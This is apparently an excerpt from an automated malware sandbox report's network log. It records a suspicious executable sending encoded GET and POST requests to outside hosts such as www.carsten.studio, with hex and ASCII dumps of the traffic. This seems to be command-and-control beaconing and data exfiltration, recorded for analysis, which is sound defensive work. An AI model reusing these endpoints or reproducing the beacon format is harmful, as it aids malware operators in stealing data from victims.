                                                                                  Data Ascii: PHM8hj-=PsWFZnsR91nuPwjiswWrLAbLeNTBxeLLqpVpHBwLDJvTgAfRsm9ByTtsKZOaPCVp9YMuhEo3VTHJ/R5JJORvXp3JMY7kxYx7rFCSKUe8GqIoviDNl7CiWGgorlnFVHOV9BdkVI3d2ehrhv7w3PfGb3vHE0dsXYDNJ1WDTxdeYC7pctQsBaxrTKEzzvfNIRhVyB8pnwGnc4teQk/1aWDoNVzE+eLrOrr9ZWzM+ZU9kF73RX46czbprSi6mqasjGkHqe+O3EO97+iYucTTmk0Zkdq3gpmfOgpsjr7FfVh5kHQ42Q2s8IWT8LlnHIwZxqRTwpBGcR17d8Lc6KdKULFyupw/u8UzZdUjDJcZpyh3WTAa8Rfmvbf+pYNIGCzR7rI9ibdhTrQo2YGGK70ktKbEAriZenqI29y0KbrHU7r6r0MwqRmpKY3cB4RcErjG/C/Ctb3T/2QhKaO+4UQ1zmunRHeversIQmtHYt8CnJ2E4egWeM9Y2mZGva8SvAN9ohNVPw/W2I43p/c4B/1as5CIMmwM0pOqfNJAEojoD+Gjz7qRsk6djFMvo3fpDytt0GbZaej0NadNZzJkwoLskp9vdTS7tRXYmMCpS3xgrmfrJCcSqvfvgVOQAOQrI8lCdtmoEjwSnqPQbpwIef6sD2IrFC5TCtjZ/M/NNBIkDXiHQmDwRsTUIhK26LpMsTEJOcx+yh9ov7qFZItWPJOZWv6kywMoeoJWA1VaOJBudOQuHnJOM/c9Upcj9OCAjwwWfAcG01CBfbBBDmmCNmEYZI4tS96caBGPFrYHMpKBBgEIa+mKMTmBwXpPhDmzNe+7ZyR76d5Kgmw3FDRYV/pshmg1g7EHL6GBeJIrav7pMS3W5VK4zaXeSxNUG/UueI2kq/JUsYSzWfd35bePjK7ZMPweqmgIuqYWt1JCbUirJ6UvL0u/cdJ4l6s8yhRf9KsccgN/BjYksSKZMgvMHUPUAaNDa3TsIK+KuoJjAGhaPjFdoFuH [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:09.802032948 CET380INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Mon, 09 Dec 2024 05:59:09 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.750005146.88.233.115805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:11.193873882 CET564OUTGET /m1g9/?PHM8hj-=Cu+laRdL4iPyeXPNzSyuHz7Zauix7uTgmbFpChU/EeiHg3j+sEFT8Tsla6iUPxcW2Lx9lDY/eAXQyxZGKIZ6WavBUK62sZwr5lKAXnKNE4AVmzabioebOGd6nWTxCWiwwjsJNJ3z4u1Z&tHfx=9byl HTTP/1.1
                                                                                  Host: www.smartcongress.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:59:12.456168890 CET380INHTTP/1.1 404 Not Found
                                                                                  content-type: text/html; charset=iso-8859-1
                                                                                  content-length: 196
                                                                                  date: Mon, 09 Dec 2024 05:59:12 GMT
                                                                                  server: LiteSpeed
                                                                                  x-tuned-by: N0C
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.750006217.160.0.200805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:18.333750963 CET832OUTPOST /8mom/ HTTP/1.1
                                                                                  Host: www.carsten.studio
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.carsten.studio
                                                                                  Referer: http://www.carsten.studio/8mom/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 69 31 2f 4a 62 70 33 4c 6d 4c 43 4a 38 37 47 44 31 4c 43 43 6f 52 46 32 58 43 65 37 49 76 77 49 58 5a 2f 4f 79 30 34 62 6a 6c 4f 61 68 71 69 7a 63 42 57 47 75 7a 79 75 47 62 45 6f 33 6b 65 70 64 58 56 55 4a 32 74 74 61 56 6a 37 4e 47 6a 77 50 4c 37 54 36 43 75 64 33 7a 35 71 52 74 41 6e 47 79 54 66 77 4c 37 48 75 73 41 47 4a 47 46 6b 6d 59 5a 34 56 39 62 7a 4e 4c 43 53 35 47 6a 5a 43 59 6c 39 55 62 6b 32 34 47 56 70 63 52 42 34 52 77 56 70 44 30 2b 2f 51 2f 59 4e 52 6d 61 52 4a 76 69 58 48 4a 30 52 4b 68 46 53 4f 42 6c 63 49 69 56 66 72 44 39 6d 33 72 5a 68 59 36 41 37 56 58 53 5a 46 6a 69 5a 7a 71 72 68 7a 6f 6b 70 66 51 3d 3d
                                                                                  Data Ascii: PHM8hj-=i1/Jbp3LmLCJ87GD1LCCoRF2XCe7IvwIXZ/Oy04bjlOahqizcBWGuzyuGbEo3kepdXVUJ2ttaVj7NGjwPL7T6Cud3z5qRtAnGyTfwL7HusAGJGFkmYZ4V9bzNLCS5GjZCYl9Ubk24GVpcRB4RwVpD0+/Q/YNRmaRJviXHJ0RKhFSOBlcIiVfrD9m3rZhY6A7VXSZFjiZzqrhzokpfQ==
                                                                                  Dec 9, 2024 06:59:19.595206976 CET1236INHTTP/1.1 200 OK
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Date: Mon, 09 Dec 2024 05:59:19 GMT
                                                                                  Server: Apache
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                  Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:19.595297098 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                  Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.750007217.160.0.200805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:20.989564896 CET852OUTPOST /8mom/ HTTP/1.1
                                                                                  Host: www.carsten.studio
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.carsten.studio
                                                                                  Referer: http://www.carsten.studio/8mom/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 69 31 2f 4a 62 70 33 4c 6d 4c 43 4a 36 71 32 44 6d 34 61 43 35 42 46 31 54 79 65 37 66 2f 77 45 58 5a 7a 4f 79 32 56 47 67 57 36 61 6d 4c 53 7a 64 44 2b 47 74 7a 79 75 4a 37 45 78 35 45 65 32 64 58 5a 79 4a 32 68 74 61 56 33 37 4e 45 37 77 4d 34 6a 51 37 53 75 66 69 6a 35 6f 66 4e 41 6e 47 79 54 66 77 4c 2f 70 75 73 59 47 49 33 31 6b 6b 38 74 33 4a 4e 62 38 46 72 43 53 39 47 6a 64 43 59 6c 66 55 61 4a 64 34 41 5a 70 63 56 52 34 51 69 74 71 4b 30 2b 31 64 66 5a 59 52 55 4c 34 4c 65 65 73 4c 70 45 69 46 53 5a 76 43 58 6b 2b 53 41 5a 7a 31 53 46 64 7a 70 39 58 50 63 64 4f 58 57 57 42 49 42 57 34 73 64 4f 4c 2b 36 46 74 4a 73 53 46 32 4b 56 6b 57 72 32 66 53 51 4a 36 35 4d 54 73 6e 4a 73 3d
                                                                                  Data Ascii: PHM8hj-=i1/Jbp3LmLCJ6q2Dm4aC5BF1Tye7f/wEXZzOy2VGgW6amLSzdD+GtzyuJ7Ex5Ee2dXZyJ2htaV37NE7wM4jQ7Sufij5ofNAnGyTfwL/pusYGI31kk8t3JNb8FrCS9GjdCYlfUaJd4AZpcVR4QitqK0+1dfZYRUL4LeesLpEiFSZvCXk+SAZz1SFdzp9XPcdOXWWBIBW4sdOL+6FtJsSF2KVkWr2fSQJ65MTsnJs=
                                                                                  Dec 9, 2024 06:59:22.289683104 CET1236INHTTP/1.1 200 OK
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Date: Mon, 09 Dec 2024 05:59:22 GMT
                                                                                  Server: Apache
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                  Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:22.289881945 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                  Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.750008217.160.0.200805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:23.649885893 CET1865OUTPOST /8mom/ HTTP/1.1
                                                                                  Host: www.carsten.studio
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.carsten.studio
                                                                                  Referer: http://www.carsten.studio/8mom/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 69 31 2f 4a 62 70 33 4c 6d 4c 43 4a 36 71 32 44 6d 34 61 43 35 42 46 31 54 79 65 37 66 2f 77 45 58 5a 7a 4f 79 32 56 47 67 58 43 61 6d 39 4f 7a 63 6b 69 47 73 7a 79 75 41 62 45 30 35 45 66 71 64 55 70 32 4a 33 64 62 61 58 50 37 4e 6c 62 77 4a 4a 6a 51 79 53 75 66 36 54 35 74 52 74 41 79 47 79 44 6c 77 4c 76 70 75 73 59 47 49 31 74 6b 67 6f 5a 33 4c 4e 62 7a 4e 4c 43 57 35 47 6a 78 43 5a 42 6c 55 61 39 72 35 77 35 70 64 30 39 34 57 58 35 71 46 30 2b 37 65 66 59 62 52 55 48 6a 4c 65 53 4b 4c 70 41 62 46 51 4a 76 42 79 4a 78 44 44 38 74 75 7a 31 38 74 49 6c 74 4b 36 30 36 51 41 4f 6f 56 42 2b 37 6d 4d 4b 65 37 34 6b 74 41 37 2b 49 76 4c 4a 5a 53 37 53 59 5a 47 73 30 6c 75 7a 79 6d 4f 68 72 74 62 31 67 5a 34 70 38 5a 36 39 49 6c 6e 32 33 46 44 42 35 36 47 35 34 7a 75 34 73 41 41 56 55 58 5a 48 68 6a 76 57 5a 2b 41 6f 58 45 48 59 4f 6d 42 52 4f 63 55 62 72 4e 51 4d 4a 6f 38 51 45 4d 6b 58 48 51 70 65 49 66 74 74 4e 43 30 70 62 56 50 49 51 6e 54 79 68 38 34 67 38 44 59 79 78 37 77 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=i1/Jbp3LmLCJ6q2Dm4aC5BF1Tye7f/wEXZzOy2VGgXCam9OzckiGszyuAbE05EfqdUp2J3dbaXP7NlbwJJjQySuf6T5tRtAyGyDlwLvpusYGI1tkgoZ3LNbzNLCW5GjxCZBlUa9r5w5pd094WX5qF0+7efYbRUHjLeSKLpAbFQJvByJxDD8tuz18tIltK606QAOoVB+7mMKe74ktA7+IvLJZS7SYZGs0luzymOhrtb1gZ4p8Z69Iln23FDB56G54zu4sAAVUXZHhjvWZ+AoXEHYOmBROcUbrNQMJo8QEMkXHQpeIfttNC0pbVPIQnTyh84g8DYyx7wmpICe3gC99lwPj9YSQY64cYPVUX/204jWDcYAA0X4LwbQ2QDcqoBDf4luJU1xuJMsOwdCRS2w6wGI1DRintyxJt0XX2djsmJkUTSyYHeBpwREX4Q9YVmcfbdWL2XlqhQg2eMyq4q99A3flKY3CyYCO7PM1NYuG9trqrWFyFRhL1ustVlZORqDDhH8fagfzkfQlZwaYZppCb95umIiM2u8PkUUTeTjnrY/0gex0svhl1fL1QPyJEqTMpTfVcp8YEJDI3wdrujFnq/qZ9CBUYhjBeZKmxyNzYP0kDGJbWSAgASKuBdOEGbYXSiGqza4m0jTmPx9pjWR0MLIALmIIZR96gsh00pXONyuH1yhExiftoK9swBuQ6FLdmFTkqbcGdNIzVlZyGd38i7aANDfT8ly3l6FN9u2vRYoIwmWj7SlIEoNLom5nkLX2eQfqGQKCgChP7M0PxNqassCuzNi2Ge2pkpFVHvgx+1PBDs0QXe4xWfU32ZvGEt2wVojJRuvc68N8XugherAHkL2Hj07tOKlaebT9rt5hziM6AcfgzHI67Eimy8JCkdUYpOxglnCuXEM33ig3GnE4Qos0I3EWNgPyCvxkysp0BkfNIEDq7F5Lg4sgn01iG/banr/KazsUEc80ADj0Gai6QtVHRJhJCHBhM1Ps7FmK0Nhv [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:25.010133028 CET1236INHTTP/1.1 200 OK
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Date: Mon, 09 Dec 2024 05:59:24 GMT
                                                                                  Server: Apache
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                  Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:25.010334015 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                  Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.750009217.160.0.200805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:26.322825909 CET561OUTGET /8mom/?tHfx=9byl&PHM8hj-=v3XpYZPN786X74uq5rH/tUlQYCSKKJswOZfu2m4ZpmP7p96MXgDDjg6tIOsL1UDqFEVhH3VxTleyM0zNBIvLkhe6iRJHcqM7Dhz4vbv1gsAxBWEBkrF+OsuoFL7bmmLpMN9zG59B7XRp HTTP/1.1
                                                                                  Host: www.carsten.studio
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:59:27.583722115 CET1236INHTTP/1.1 200 OK
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 4545
                                                                                  Connection: close
                                                                                  Date: Mon, 09 Dec 2024 05:59:27 GMT
                                                                                  Server: Apache
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 